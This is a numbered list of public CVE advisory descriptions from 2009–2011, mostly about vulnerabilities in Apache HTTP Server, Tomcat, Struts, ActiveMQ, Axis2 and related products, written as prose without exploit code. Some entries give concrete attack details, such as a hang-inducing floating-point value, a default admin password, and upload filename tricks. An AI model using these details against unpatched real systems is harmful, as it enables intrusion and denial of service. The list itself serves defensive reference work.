6199| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
6200| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
6201| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
6202| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
6203| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
6204| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
6205| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
6206| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
6207| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
6208| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
6209| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
6210| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
6211| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
6212| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
6213| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
6214| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
6215| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
6216| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
6217| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
6218| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
6219| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
6220| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
6221| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
6222| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
6223| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
6224| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
6225| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
6226| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
6227| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
6228| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
6229| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
6230| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
6231| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
6232| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
6233| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
6234| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
6235| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
6236| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
6237| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
6238| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
6239| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
6240| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
6241| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
6242| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
6243| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6244| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
6245| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
6246| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
6247| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
6248| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
6249| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
6250| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
6251| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
6252| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
6253| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
6254| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
6255| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
6256| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
6257| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
6258| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
6259| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6260| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
6261| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
6262| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
6263| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
6264| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
6265| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
6266| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
6267| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
6268| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
6269| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
6270| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
6271| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
6272| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
6273| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
6274| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
6275| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
6276| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
6277| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
6278| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
6279| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
6280| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
6281| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
6282| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
6283| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
6284| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
6285| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
6286| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
6287| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
6288| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
6289| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
6290| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
6291| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
6292| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
6293| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
6294| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
6295| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
6296| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
6297| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
6298| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
6299| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
6300| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
6301| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
6302| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
6303| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
